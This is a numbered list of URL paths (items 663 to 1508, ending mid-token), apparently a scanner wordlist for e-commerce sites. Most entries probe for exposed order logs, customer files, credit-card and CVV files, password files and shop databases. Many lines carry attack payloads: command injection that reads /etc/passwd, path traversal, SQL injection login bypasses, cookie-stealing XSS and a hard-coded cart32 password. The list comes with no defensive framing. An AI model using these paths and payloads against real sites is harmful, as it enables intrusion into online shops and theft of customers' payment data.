  663. /cgi_bin/DCShop/auth_data/auth_user_file.txt

  664. /cgi_bin/DCShop/orders/orders.txt

  665. /cgi_bin/Orders/orders.txt

  666. /cgi_bin/dcshop/Auth_data/auth_user_file.txt

  667. /cgi_bin/dcshop/Orders/orders.txt

  668. /cgi_bin/dcshop/auth_data/auth_user_file.txt

  669. /cgi_bin/dcshop/orders/orders.txt

  670. /cgi_bin/orders/orders.txt

  671. /cgi_bin/shop/Auth_data/auth_user_file.txt

  672. /cgi_bin/shop/Orders/orders.txt

  673. /cgi_bin/shop/auth_data/auth_user_file.txt

  674. /cgi_bin/shop/orders/orders.txt

  675. /cgibin/DCShop/Auth_data/auth_user_file.txt

  676. /cgibin/DCShop/Orders/orders.txt

  677. /cgibin/DCShop/auth_data/auth_user_file.txt

  678. /cgibin/DCShop/orders/orders.txt

  679. /cgibin/Orders/orders.txt

  680. /cgibin/Web_Store/web_store.cgi

  681. /cgibin/dcshop/Auth_data/auth_user_file.txt

  682. /cgibin/dcshop/Orders/orders.txt

  683. /cgibin/dcshop/auth_data/auth_user_file.txt

  684. /cgibin/dcshop/orders/orders.txt

  685. /cgibin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|

  686. /cgibin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt

  687. /cgibin/i-shop/admin/store_user_lib.pl

  688. /cgibin/ib

  689. /cgibin/ibill/

  690. /cgibin/ibll

  691. /cgibin/ibll.log

  692. /cgibin/msbill

  693. /cgibin/msbill.log

  694. /cgibin/netbilling

  695. /cgibin/netbilling/

  696. /cgibin/netbilling/.dbusers.db

  697. /cgibin/netbilling/.freshteen

  698. /cgibin/netbilling/.htaccess

  699. /cgibin/netbilling/.htpasswd

  700. /cgibin/netbilling/.htusers

  701. /cgibin/netbilling/.passwrd

  702. /cgibin/netbilling/WS_FTP.LOG

  703. /cgibin/netbilling/crontab.txt

  704. /cgibin/netbilling/expire.txt

  705. /cgibin/netbilling/htusers

  706. /cgibin/netbilling/robots.txt

  707. /cgibin/orders/orders.txt

  708. /cgibin/shop/Auth_data/auth_user_file.txt

  709. /cgibin/shop/Orders/orders.txt

  710. /cgibin/shop/auth_data/auth_user_file.txt

  711. /cgibin/shop/orders/orders.txt

  712. /cgibin/shopper.cgi?search=action&keywords=TRY%20&template=order.log

  713. /cgibin/webcash

  714. /cgibin/webcash/

  715. /cgibin/webcash/.dbusers.db

  716. /cgibin/webcash/.htaccess

  717. /cgibin/webcash/.htpasswd

  718. /cgibin/webcash/.htusers

  719. /cgibin/webcash/.passwrd

  720. /cgibin/webcash/WS_FTP.LOG

  721. /cgibin/webcash/crontab.txt

  722. /cgibin/webcash/expire.txt

  723. /cgibin/webcash/htusers

  724. /cgibin/webcash/robots.txt

  725. /cgin-bin2/Web_Store/web_store.cgi

  726. /cgis/DCShop/auth_data/auth_user_file.txt

  727. /cgis/DCShop/orders/orders.txt

  728. /cgis/cart.pl

  729. /cgis/orders/orders.txt

  730. /config/checks.txt

  731. /checkout.php

  732. /checkout_payment.php

  733. /checkout_payment.php?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E

  734. /checkoutdb.php

  735. /comersus.mdb

  736. /comersus/

  737. /comersus/BackOfficeGold/comersus_backoffice_genericSqlExec.asp

  738. /comersus/WS_FTP.ini

  739. /comersus/admin

  740. /comersus/admin.php

  741. /comersus/admin/

  742. /comersus/admin/customers.csv

  743. /comersus/admin/customers.xls

  744. /comersus/admin/index.php

  745. /comersus/admin/sales.csv

  746. /comersus/backoffice+

  747. /comersus/backoffice+/

  748. /comersus/backoffice+/default.asp

  749. /comersus/backoffice/

  750. /comersus/backoffice/customers.csv

  751. /comersus/backoffice/customers.xls

  752. /comersus/backoffice/default.asp

  753. /comersus/backoffice/index.asp

  754. /comersus/backoffice/sales.csv

  755. /comersus/backoffice/sales.xls

  756. /comersus/backofficegold/customers.csv

  757. /comersus/backofficegold/customers.xls

  758. /comersus/backofficegold/default.asp

  759. /comersus/backofficegold/sales.csv

  760. /comersus/backofficegold/sales.xls

  761. /comersus/backofficelite/chart.gif

  762. /comersus/backofficelite/comersus_backoffice_index.asp

  763. /comersus/backofficelite/customers.csv

  764. /comersus/backofficelite/customers.xls

  765. /comersus/backofficelite/images/

  766. /comersus/backofficelite/index.asp

  767. /comersus/backofficelite/sales.csv

  768. /comersus/backofficelite/sales.xls

  769. /comersus/comersus.mdb

  770. /comersus/comersus/backofficelite/default.asp

  771. /comersus/database/*

  772. /comersus/database/admin/index.php

  773. /comersus/database/comersus.mdb

  774. /comersus/database/comersus_OfflinepaymentForm.asp

  775. /comersus/database/comersus_gatewaysecurepay.asp

  776. /comersus/database/comersus_viewItem.asp

  777. /comersus/database/sales.xls

  778. /comersus/databsse/comersus.mdb

  779. /comersus/diagnosticsAndTools

  780. /comersus/nhun

  781. /comersus/store/backofficelite/default.asp

  782. /comersus/store/comersus.mdb

  783. /comersus/store/comersus/backofficelite/default.asp

  784. /comersus/store/comersus/comersus.mdb

  785. /comersus/store/comersus/databases/comersus.mdb

  786. /comersus/store/comersus_dbtest.asp

  787. /comersus/store/comersus_optAuctionListAll.asp

  788. /comersus/store/comersus_optAuctionListall.asp

  789. /comersus/store/comersus_optEmailToFriendForm.asp

  790. /comersus/store/comersus_optForgotPasswordForm.asp

  791. /comersus/store/comersus_optListBestSellers.asp

  792. /comersus/store/comersus_optNewsletterAddemailForm.asp

  793. /comersus/store/comersus_optPriceListExec.asp

  794. /comersus/store/comersus_optReviewAddForm.asp

  795. /comersus/store/comersus_viewitem.asp

  796. /comersus/store/database

  797. /comersus/store/database/comersus.mdb

  798. /comersus/store/databases/comersus.mdb

  799. /comersus/store/db/store.mdb

  800. /comersus/store/favicon.ico

  801. /comersus/store/shopadmin1.asp

  802. /comersus/store/shopdbtest.asp

  803. /comersus/store/store/database/comersus.mdb

  804. /commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html

  805. /commerce/

  806. /config/orders.txt

  807. /custdata/

  808. /customer/

  809. /customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd

  810. /customerdata.nsf

  811. /customers

  812. /customers.csv

  813. /customers.xls

  814. /customers/

  815. /cvv.csv

  816. /cvv.dbf

  817. /cvv.ldf

  818. /cvv.log

  819. /cvv.mbf

  820. /cvv.txt

  821. /cvv2.csv

  822. /cvv2.log

  823. /cvv2.txt

  824. /cybercash-3.2/conf/merchant_conf

  825. /cybercash/

  826. /cybercash/conf/

  827. /cybercash/conf/merchant_conf

  828. /data/paypal

  829. /database/MFIIstore.mdb

  830. /database/ShopCart2.mdb

  831. /database/cart32.mdb

  832. /database/comersus.mdb

  833. /database/metacart.mdb

  834. /database/sales.xls

  835. /database/shopping500.mdb

  836. /database/virtuastore.mdb

  837. /database/xshop.mdb

  838. /db/merchant_conf

  839. /db/shop.mdb

  840. /db/store.mdb

  841. /db_order.txt

  842. /dc/Orders/orders.txt

  843. /dcshop/Auth_data/auth_user_file.txt

  844. /dcshop/Orders/orders.txt

  845. /dcshop/auth_data/auth_user_file.txt

  846. /dcshop/orders/orders.txt

  847. /dcshop_admin.cgi

  848. /e-cart/

  849. /eshop.pl/seite=;cat%20eshop.pl|

  850. /eshop/

  851. /eshop/10Expand.asp?ProdcutCode=' having 1=1

  852. /eshop/10Expand.asp?ProductCode='

  853. /eshop/20Review.asp?ProductCode='

  854. /eshop/20Reviw.asp?ProductCoce=' having 1=1 --

  855. /eshop/database/shop.mdb

  856. /eshop/shop.mdb

  857. /ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|

  858. /ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1

  859. /fpdb/

  860. /fpdb/acart.mdb

  861. /fpdb/acart2.mdb

  862. /fpdb/acart20.mdb

  863. /fpdb/acart2_0.mdb

  864. /fpdb/apstore.mdb

  865. /fpdb/shop.mdb

  866. /fpdb/shopping.mdb

  867. /fpdb/shopping500.mdb

  868. /fpdb/store.mdb

  869. /fpdb/storefront.mdb

  870. /htbin/DCShop/auth_data/auth_user_file.txt

  871. /htbin/DCShop/orders/orders.txt

  872. /htbin/cart.pl

  873. /htbin/orders/orders.txt

  874. /htbin/shop/auth_data/auth_user_file.txt

  875. /htbin/shop/orders/orders.txt

  876. /i-shop/admin/store.log

  877. /i-shop/admin/store_user_lib.pl

  878. /i-shoppro/

  879. /i-shoppro/admin/store.log

  880. /include/orders.inc

  881. /ishop/

  882. /log/xcartdump.sql

  883. /log_files/my_order.log

  884. /log_files/order.csv

  885. /log_files/order.log

  886. /log_files/order.txt

  887. /log_files/orders.csv

  888. /log_orders

  889. /log_orders/

  890. /loja/midicart.mdb

  891. /loja/order-shop.dat

  892. /loja/order.txt

  893. /loja/pkg/catalog/extras/orders/

  894. /main/webcash

  895. /mall/Auth_data/auth_user_file.txt

  896. /mall/Orders/orders.txt

  897. /mall/auth_data/auth_user_file.txt

  898. /mall/orders/orders.txt

  899. /mall_log_files

  900. /mall_log_files/

  901. /mall_log_files/order.log

  902. /mcartfree/database/metacart.mdb

  903. /members/webcash

  904. /merchants/admin.pw

  905. /metacart/database/metacart.mdb

  906. /midicart.mdb

  907. /midicart_asp/shop/midicart.md

  908. /midicart_asp/shop/midicart.mdb

  909. /modules/paypal.php

  910. /msbill

  911. /msbill/msbilllog.txt

  912. /mtdata/mtstore.nsf

  913. /mtstore.nsf

  914. /my_order.log

  915. /my_orders.log

  916. /myorder.log

  917. /myorder.txt

  918. /myorderlog.txt

  919. /myorders.log

  920. /netbilling

  921. /online-store/scstore/

  922. /online-store/scstore/scpages/

  923. /onlinepurchase

  924. /onlinepurchase/

  925. /onlinepurchase/authorization/account.asp?accnumber=100000001

  926. /order

  927. /order-shop.dat

  928. /order.log

  929. /order.sql

  930. /order.txt

  931. /order/

  932. /order/admin

  933. /order/admin/

  934. /order/cartmanager.cgi

  935. /order/compatible.cgi

  936. /order/db_manager.cgi

  937. /order/jadat.asp

  938. /order/order.dat

  939. /order/order.log

  940. /order/order_log.dat

  941. /order/order_log_v12.dat

  942. /order/shop-oder.dat

  943. /order1.log

  944. /order_log_v12.dat

  945. /orderdetalis.aspx

  946. /orderform/orders.txt

  947. /orderinfo.txt

  948. /orders

  949. /orders*

  950. /orders.htm

  951. /orders.inc

  952. /orders.log

  953. /orders.mdb

  954. /orders.php

  955. /orders.sql

  956. /orders.txt

  957. /orders/

  958. /orders/%3f.jsp

  959. /orders/*

  960. /orders/*.olf

  961. /orders/?open

  962. /orders/WS_FTP.ini

  963. /orders/admin

  964. /orders/admin.asp

  965. /orders/admin/

  966. /orders/cart.pl

  967. /orders/cartmanager.cgi

  968. /orders/checks.txt

  969. /orders/db_manager.cgi

  970. /orders/import.txt

  971. /orders/info.xml

  972. /orders/jadat.dat

  973. /orders/mountain.cfg

  974. /orders/order-shop.dat

  975. /orders/order.log

  976. /orders/order.txt

  977. /orders/order_log.dat

  978. /orders/order_log_v12.dat

  979. /orders/orders.log

  980. /orders/orders.txt

  981. /orders/results

  982. /orders/track.db

  983. /orders?open

  984. /ordersorders.txt

  985. /oscommerce/

  986. /oscommerce/catalog/

  987. /oscommerce/catalog/admin/

  988. /oscommerce/catalog/admin/orders.php

  989. /oscommerce/default.php

  990. /payment.mart

  991. /payment/

  992. /payments/

  993. /paypal/command

  994. /paypal/test.txt

  995. /paypal/test2.txt

  996. /paypal/test3.txt

  997. /paypal/test4.txt

  998. /paytest.php

  999. /pdg_cart/order.log

  1000. /private-cgi-bin/cart32/1.txt

  1001. /private-cgi-bin/cart32/2.txt

  1002. /private-cgi-bin/cart32/3.txt

  1003. /private-cgi-bin/cart32/4.txt

  1004. /private-cgi-bin/cart32/5.txt

  1005. /private-cgi-bin/cart32/6.txt

  1006. /private-cgi-bin/cart32/7.txt

  1007. /productcart/AspShipCalc/

  1008. /productcart/UPSLicense/

  1009. /productcart/charts/

  1010. /productcart/database/

  1011. /productcart/database/EIPC.mdb

  1012. /productcart/includes/

  1013. /productcart/includes/adminv.asp

  1014. /productcart/includes/diagtxt.txt

  1015. /productcart/includes/opendb.asp

  1016. /productcart/includes/status.inc

  1017. /productcart/pc/

  1018. /productcart/pc/Custva.asp

  1019. /productcart/pc/pcadmin/

  1020. /productcart/pcadmin/

  1021. /productcart/pcadmin/login.asp

  1022. /productcart/pcadmin/login.asp?idadmin=' or '1'='1

  1023. /productcart/pcadmin/login.asp?idadmin='' or 1=1--

  1024. /productcart/pcadmin/login_1.asp

  1025. /productcart/pdadmin/login.asp?idadmin=' having 1=1 --

  1026. /productcart/setup_2/

  1027. /produccart/pdacmin/login.asp

  1028. /purchase

  1029. /purchase/

  1030. /purchases

  1031. /purchases/

  1032. /q-shop25/admin/security.asp

  1033. /q-shop25/inc/conx.asp

  1034. /qshop/db/store.mdb

  1035. /qshop/store.mdb

  1036. /quickstore.cfg

  1037. /quikstore.cfg

  1038. /quikstore.cgi

  1039. /quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts

  1040. /quikstore.cgi?blah&template=../../../../../../../../../../../../usr/bin/id|

  1041. /quikstore.cgi?blah&template=../../../../../../../../../../etc/passwd%00.html

  1042. /quikstore.cgi?store='

  1043. /s-cart/

  1044. /s-cart/admin

  1045. /s-cart/admin/

  1046. /sales

  1047. /sales.csv

  1048. /sales.xls

  1049. /sales/

  1050. /scart.mdb/ashopkart20+-+ashoptkart20/admin

  1051. /scripts/DCShop/auth_data/auth_user_file.txt

  1052. /scripts/DCShop/orders/orders.txt

  1053. /scripts/cart.pl

  1054. /scripts/cart32.exe

  1055. /scripts/cart32.exe/cart32clientlist

  1056. /scripts/cart32.exe/cart32clientlist?passwd=wemilo

  1057. /scripts/orders/orders.txt

  1058. /scripts/shop/auth_data/auth_user_file.txt

  1059. /scripts/shop/orders/orders.txt

  1060. /scripts/webcash/

  1061. /scripts/webcash/.dbusers.db

  1062. /scripts/webcash/.htaccess

  1063. /scripts/webcash/.htpasswd

  1064. /scripts/webcash/.htusers

  1065. /scripts/webcash/.passwrd

  1066. /scripts/webcash/WS_FTP.LOG

  1067. /scripts/webcash/crontab.txt

  1068. /scripts/webcash/expire.txt

  1069. /scripts/webcash/htusers

  1070. /scripts/webcash/robots.txt

  1071. /secure/cart.pl

  1072. /secure/order-shop.dat

  1073. /secure/order.log

  1074. /secure/order.txt

  1075. /secure/orders

  1076. /secure/orders*

  1077. /secure/orders.secure

  1078. /secure/orders/

  1079. /secure/orders/jadat.dat

  1080. /secure/orders/order-shop.dat

  1081. /secure/orders/order.txt

  1082. /secure/secure/order-shop.dat

  1083. /secure/secure/order.txt

  1084. /shipping/

  1085. /shop

  1086. /shop.asp'

  1087. /shop.asp()

  1088. /shop.asp)

  1089. /shop.cgi

  1090. /shop.mdb

  1091. /shop.pl

  1092. /shop/

  1093. /shop/

  1094. /shop/%00

  1095. /shop/%3f.jsp

  1096. /shop//include/

  1097. /shop/0%20WEB%20CATEGORIES

  1098. /shop/?category=xxxxxx&parent=0&page=x&/'

  1099. /shop/?open

  1100. /shop/ADMIN/login.ASP

  1101. /shop/Admin_files/commerce.cgi

  1102. /shop/Auth_data/auth_user_file.txt

  1103. /shop/DCShop/Auth_data/auth_user_file.txt

  1104. /shop/DCShop/Orders/orders.txt

  1105. /shop/DCShop/auth_data/auth_user_file.txt

  1106. /shop/DCShop/orders/orders.txt

  1107. /shop/Orders/orders.txt

  1108. /shop/Smarty-2.5.0/

  1109. /shop/Smarty-2.5.0/Smarty.class.php

  1110. /shop/WEB-INF/

  1111. /shop/WEB-INF/ShopTags.tld

  1112. /shop/WEB-INF/classes/

  1113. /shop/WEB-INF/classes/db.properties

  1114. /shop/WEB-INF/lib/

  1115. /shop/WEB-INF/lib/mysql-connector-java-2.0.14-bin.jar

  1116. /shop/WEB-INF/web.warContent

  1117. /shop/WEB-INF/web.xml

  1118. /shop/WSFTP.LOG

  1119. /shop/WS_FTP.INI

  1120. /shop/WS_FTP.LOG

  1121. /shop/WS_FTP.LOG/?open

  1122. /shop/WS_FTP.LOG?open

  1123. /shop/WS_FTP.ini

  1124. /shop/WS_fTP.log

  1125. /shop/Web.Config

  1126. /shop/_vti_cnf/form_results.htm

  1127. /shop/_vti_cnf/form_results.html

  1128. /shop/_vti_cnf/form_results.txt

  1129. /shop/_vti_cnf/order.log

  1130. /shop/_vti_cnf/order.txt

  1131. /shop/add.jsp

  1132. /shop/admin

  1133. /shop/admin.asp

  1134. /shop/admin.html

  1135. /shop/admin/

  1136. /shop/admin/Admin.asp

  1137. /shop/admin/WS_FTP.LOG

  1138. /shop/admin/category_detail.php

  1139. /shop/admin/config.inc.php

  1140. /shop/admin/db.sql

  1141. /shop/admin/default.asp

  1142. /shop/admin/detail.php

  1143. /shop/admin/footer.php

  1144. /shop/admin/graphics/

  1145. /shop/admin/header.php

  1146. /shop/admin/index.php

  1147. /shop/admin/jscript/

  1148. /shop/admin/list_categories.php

  1149. /shop/admin/login.asp

  1150. /shop/admin/mysql.info.php

  1151. /shop/admin/shop_login.htm

  1152. /shop/administrador.asp

  1153. /shop/auth_data/auth_user_file.txt

  1154. /shop/authorize.csv

  1155. /shop/authorizenet.log

  1156. /shop/authorizenets.old

  1157. /shop/backlink.js

  1158. /shop/card.csv

  1159. /shop/card.log

  1160. /shop/card.txt

  1161. /shop/cart.pl

  1162. /shop/cart.sql

  1163. /shop/cartmanager.cgi

  1164. /shop/category1.tpl

  1165. /shop/cc.csv

  1166. /shop/cc.log

  1167. /shop/cc.txt

  1168. /shop/ccv.csv

  1169. /shop/ccv.log

  1170. /shop/ccv.txt

  1171. /shop/cgi-bin/DCShop/

  1172. /shop/cgi-bin/DCShop/Orders/

  1173. /shop/cgi-bin/DCShop/dcprotect.pl

  1174. /shop/cgi-bin/DCShop/dcshop_admin.cgi

  1175. /shop/cgi-bin/DCShop/dcshop_admin.setup

  1176. /shop/checkout.php

  1177. /shop/checkoutdb.php

  1178. /shop/client.eml

  1179. /shop/code.php

  1180. /shop/code.php3

  1181. /shop/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html

  1182. /shop/compatible.cgi

  1183. /shop/conf/

  1184. /shop/conf/merchant_conf

  1185. /shop/config.inc.php

  1186. /shop/configure.php

  1187. /shop/create.jsp

  1188. /shop/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd

  1189. /shop/customer/home.php

  1190. /shop/customers.csv

  1191. /shop/customers.xls

  1192. /shop/cvv.csv

  1193. /shop/cvv.log

  1194. /shop/cvv.txt

  1195. /shop/cvv2.csv

  1196. /shop/cvv2.log

  1197. /shop/cvv2.txt

  1198. /shop/cybercash/

  1199. /shop/cybercash/conf/merchant_conf

  1200. /shop/data.info

  1201. /shop/data/

  1202. /shop/data/info.dat

  1203. /shop/database.mdb

  1204. /shop/database/

  1205. /shop/database/metacart.mdb

  1206. /shop/database/virtuastore.mdb

  1207. /shop/db

  1208. /shop/db.xml

  1209. /shop/db/

  1210. /shop/db/%3f.jsp

  1211. /shop/db/PTSC.mdb

  1212. /shop/db/database.mdb

  1213. /shop/db/merchant_conf

  1214. /shop/db_manager.cgi

  1215. /shop/dcshop/Auth_data/auth_user_file.txt

  1216. /shop/dcshop/Orders/orders.txt

  1217. /shop/dcshop/auth_data/auth_user_file.txt

  1218. /shop/dcshop/orders/orders.txt

  1219. /shop/diag_dbtest.asp

  1220. /shop/diagnose.cgi

  1221. /shop/docreate.jsp

  1222. /shop/dologin.jsp

  1223. /shop/dosearch.jsp

  1224. /shop/entry.dat

  1225. /shop/eshop.pl/seite=;cat%20eshop.pl|

  1226. /shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|

  1227. /shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1

  1228. /shop/iclude/

  1229. /shop/idbC.dat

  1230. /shop/include/func.php

  1231. /shop/info.php

  1232. /shop/info.php3

  1233. /shop/info.xml

  1234. /shop/jadat.dat

  1235. /shop/lists.csv

  1236. /shop/log/

  1237. /shop/log/imglog.txt

  1238. /shop/log/index.html

  1239. /shop/log/x-errors_php.txt

  1240. /shop/log/x-errors_sql.txt

  1241. /shop/log/xcartdump.sql

  1242. /shop/log_files/

  1243. /shop/member_html.cgi?file=;cat%20/etc/passwd|

  1244. /shop/member_html.cgi?file=|cat%20/etc/passwd|

  1245. /shop/midcart.mdb

  1246. /shop/midicart.mdb

  1247. /shop/normal_html.cgi?file=<script>alert(;\"Vulnerable\")</script>

  1248. /shop/normal_html.cgi?file=../../../../../../etc/issue%00

  1249. /shop/normal_html.cgi?file=;cat%20/etc/passwd|

  1250. /shop/normal_html.cgi?file=;id|

  1251. /shop/normal_html.cgi?file=|cat%20/etc/passwd|

  1252. /shop/normal_html.cgi?file=|id|

  1253. /shop/order-shop.dat

  1254. /shop/order.log

  1255. /shop/order.txt

  1256. /shop/order/order.log

  1257. /shop/orderdetalis.aspx

  1258. /shop/orders.inc

  1259. /shop/orders.log

  1260. /shop/orders/jadat.dat

  1261. /shop/orders/order-shop.dat

  1262. /shop/orders/order.txt

  1263. /shop/orders/orders.txt

  1264. /shop/owner

  1265. /shop/php_files/site.config.php

  1266. /shop/php_files/site.config.php+

  1267. /shop/phpinfo.php

  1268. /shop/phpinfo.php3

  1269. /shop/product.asp

  1270. /shop/product.ast

  1271. /shop/provider/

  1272. /shop/provider/import.php

  1273. /shop/provider/product_modify.php

  1274. /shop/readme.txt

  1275. /shop/registry.dat

  1276. /shop/sales.csv

  1277. /shop/scripts/

  1278. /shop/search.php

  1279. /shop/search.php?q='

  1280. /shop/secure/

  1281. /shop/shop.dat

  1282. /shop/shop.db

  1283. /shop/shop.sql

  1284. /shop/shop/shop.dat

  1285. /shop/shopdbtest.asp

  1286. /shop/show.php

  1287. /shop/show.php?q='

  1288. /shop/show_cart.inc.php

  1289. /shop/stats.php

  1290. /shop/system

  1291. /shop/system/

  1292. /shop/tep_admin-pr2.1/admin/

  1293. /shop/tep_admin-pr2.1/admin/orders.php

  1294. /shop/termofuse.html

  1295. /shop/test.log

  1296. /shop/vars

  1297. /shop/vars.txt

  1298. /shop/web.xml

  1299. /shop/ws%5fftp.ini

  1300. /shop/ws_%66tp.ini

  1301. /shop/ws_f%74p.ini

  1302. /shop/ws_ft%70.ini

  1303. /shop/ws_ftp%2eini

  1304. /shop/ws_ftp.%69ni

  1305. /shop/ws_ftp.i%6ei

  1306. /shop/ws_ftp.in%69

  1307. /shop/ws_ftp.ini

  1308. /shop/ws_ftp.log

  1309. /shop?open

  1310. /shop_login.asp

  1311. /shopa_sessionlist.asp

  1312. /shopadmin.asp

  1313. /shopadmin.asp

  1314. /shopadmin.mdb

  1315. /shopadmin1.asp

  1316. /shopadmin_login.htm

  1317. /shopcart/

  1318. /shopcart/ShopCart2.mdb

  1319. /shopcart/database/ShopCart2.mdb

  1320. /shopdb/

  1321. /shopdbtest.asp

  1322. /shopexd.asp

  1323. /shoponline/fpdb/shop.mdb

  1324. /shoponline/fpdb/shop.mdb

  1325. /shopper

  1326. /shopper.cgi?preadd=action&key=PROFA&template=order.log

  1327. /shopper.cgi?preadd=action&key=PROFA&template=order1.log

  1328. /shopper.conf

  1329. /shopper.exe/cgi-bin/.../shopper.conf

  1330. /shopper.exe?display=action&template=order.log

  1331. /shopper/

  1332. /shopping

  1333. /shopping.mdb

  1334. /shopping/

  1335. /shopping/%3f.jsp

  1336. /shopping/Auth_data/auth_user_file.txt

  1337. /shopping/Orders/orders.txt

  1338. /shopping/WSFTP.LOG

  1339. /shopping/WS_FTP.INI

  1340. /shopping/WS_FTP.LOG

  1341. /shopping/WS_FTP.LOG/?open

  1342. /shopping/WS_FTP.LOG?open

  1343. /shopping/WS_FTP.ini

  1344. /shopping/WS_fTP.log

  1345. /shopping/Web.Config

  1346. /shopping/admin

  1347. /shopping/admin.asp

  1348. /shopping/admin/

  1349. /shopping/admin/orders.php

  1350. /shopping/auth_data/auth_user_file.txt

  1351. /shopping/cartmanager.cgi

  1352. /shopping/code.php3

  1353. /shopping/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html

  1354. /shopping/compatible.cgi

  1355. /shopping/data.info

  1356. /shopping/database/comersus.mdb

  1357. /shopping/database/metacart.mdb

  1358. /shopping/db_manager.cgi

  1359. /shopping/diag_dbtest.asp

  1360. /shopping/diagnose.cgi

  1361. /shopping/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|

  1362. /shopping/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1

  1363. /shopping/idbC.dat

  1364. /shopping/info.dat

  1365. /shopping/info.xml

  1366. /shopping/log_files/

  1367. /shopping/midicart.mdb

  1368. /shopping/orders/jadat.dat

  1369. /shopping/orders/order-shop.dat

  1370. /shopping/orders/order.txt

  1371. /shopping/orders/orders.txt

  1372. /shopping/resgistry.dat

  1373. /shopping/secure/

  1374. /shopping/secure/orders/

  1375. /shopping/shop.mdb

  1376. /shopping/shopadmin_login.htm

  1377. /shopping/shopdbtest.asp

  1378. /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>","<script>alert('test')</script>

  1379. /shopping/shopping.mdb

  1380. /shopping/shopping200.mdb

  1381. /shopping/shopping300.mdb

  1382. /shopping/shopping400.mdb

  1383. /shopping/shopping450.mdb

  1384. /shopping/shopping500.mdb

  1385. /shopping/shopsearch.asp

  1386. /shopping/vars.txt

  1387. /shopping/ws%5fftp.ini

  1388. /shopping/ws_%66tp.ini

  1389. /shopping/ws_f%74p.ini

  1390. /shopping/ws_ft%70.ini

  1391. /shopping/ws_ftp%2eini

  1392. /shopping/ws_ftp.%69ni

  1393. /shopping/ws_ftp.i%6ei

  1394. /shopping/ws_ftp.in%69

  1395. /shopping/ws_ftp.ini

  1396. /shopping/ws_ftp.log

  1397. /shopping200.mdb

  1398. /shopping300.mdb

  1399. /shopping400.mdb

  1400. /shopping450.mdb

  1401. /shopping500.mdb

  1402. /shopping_cart

  1403. /shopping_cart/

  1404. /shopping_cart/0%20WEB%20CATEGORIES

  1405. /shopping_cart/WS_FTP.LOG

  1406. /shopping_cart/admin/

  1407. /shopping_cart/admin/WS_FTP.LOG

  1408. /shopping_cart/admin/category_detail.php

  1409. /shopping_cart/admin/config.inc.php

  1410. /shopping_cart/admin/db.sql

  1411. /shopping_cart/admin/detail.php

  1412. /shopping_cart/admin/footer.php

  1413. /shopping_cart/admin/graphics/

  1414. /shopping_cart/admin/header.php

  1415. /shopping_cart/admin/index.php

  1416. /shopping_cart/admin/jscript/

  1417. /shopping_cart/admin/list_categories.php

  1418. /shopping_cart/admin/mysql.info.php

  1419. /shopping_cart/backlink.js

  1420. /shopping_cart/checkout.php

  1421. /shopping_cart/checkoutdb.php

  1422. /shopping_cart/config.inc.php

  1423. /shopping_cart/configure.php

  1424. /shoppingdirectory/midicart.mdb

  1425. /shoppping/administrador.asp

  1426. /shoppping/secure/orders.secure

  1427. /shoppping/tables.sql

  1428. /shopsearch.asp

  1429. /show_cart.inc.php

  1430. /store

  1431. /store*

  1432. /store.mdb

  1433. /store/

  1434. /store/./

  1435. /store/./WEB-INF/

  1436. /store/./WEB-INF/ShopTags.tld

  1437. /store/./WEB-INF/classes/

  1438. /store/./WEB-INF/lib/

  1439. /store/./WEB-INF/web.xml

  1440. /store//DCShop/dcshop_admin.cgi

  1441. /store/?open

  1442. /store/Admin_files/

  1443. /store/Admin_files/_vti_cnf/form_results.txt

  1444. /store/Admin_files/_vti_cnf/order.log

  1445. /store/Admin_files/myorderlog.txt

  1446. /store/Admin_files/order.log

  1447. /store/Admin_files/orders.txt

  1448. /store/WEB-INF/

  1449. /store/WEB-INF/ShopTags.tld

  1450. /store/WEB-INF/classes/

  1451. /store/WEB-INF/lib/

  1452. /store/WEB-INF/web.xml

  1453. /store/WSFTP.LOG

  1454. /store/WS_FTP.INI

  1455. /store/WS_FTP.LOG

  1456. /store/WS_FTP.LOG/?open

  1457. /store/WS_FTP.LOG?open

  1458. /store/WS_FTP.ini

  1459. /store/WS_fTP.log

  1460. /store/Web.Config

  1461. /store/_vti_cnf/form_results.htm

  1462. /store/_vti_cnf/form_results.html

  1463. /store/_vti_cnf/form_results.txt

  1464. /store/_vti_cnf/order.log

  1465. /store/_vti_cnf/order.txt

  1466. /store/admin

  1467. /store/admin.dat

  1468. /store/admin.pass

  1469. /store/admin.passwd

  1470. /store/admin/

  1471. /store/admin/admin.dat

  1472. /store/admin/default.asp

  1473. /store/admin_files/

  1474. /store/admin_files/_vti_cnf/

  1475. /store/admin_files/_vti_cnf/form_results.txt

  1476. /store/admin_files/order.log

  1477. /store/agora.cgi

  1478. /store/cart.cgi

  1479. /store/cart.pl

  1480. /store/cartmanager.cgi

  1481. /store/category1.tpl

  1482. /store/client.eml

  1483. /store/comersus.mdb

  1484. /store/comersus/comersus.mdb

  1485. /store/comersus/database/comersus.mdb

  1486. /store/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html

  1487. /store/compatible.cgi

  1488. /store/create.jsp

  1489. /store/customers/

  1490. /store/database.dat

  1491. /store/database.db

  1492. /store/database.nsf

  1493. /store/database.sql

  1494. /store/database/comersus.mdb

  1495. /store/database/sql

  1496. /store/daten/

  1497. /store/db.xml

  1498. /store/db/

  1499. /store/db/database.mdb

  1500. /store/db/store.mdb

  1501. /store/dcshop_admin.cgi

  1502. /store/docreate.jsp

  1503. /store/dologin.jsp

  1504. /store/dosearch.jsp

  1505. /store/entry.dat

  1506. /store/idbC.dat

  1507. /store/index.cgi?page=../../../../../../../../etc/passwd

  1508. /store/index.js0x70

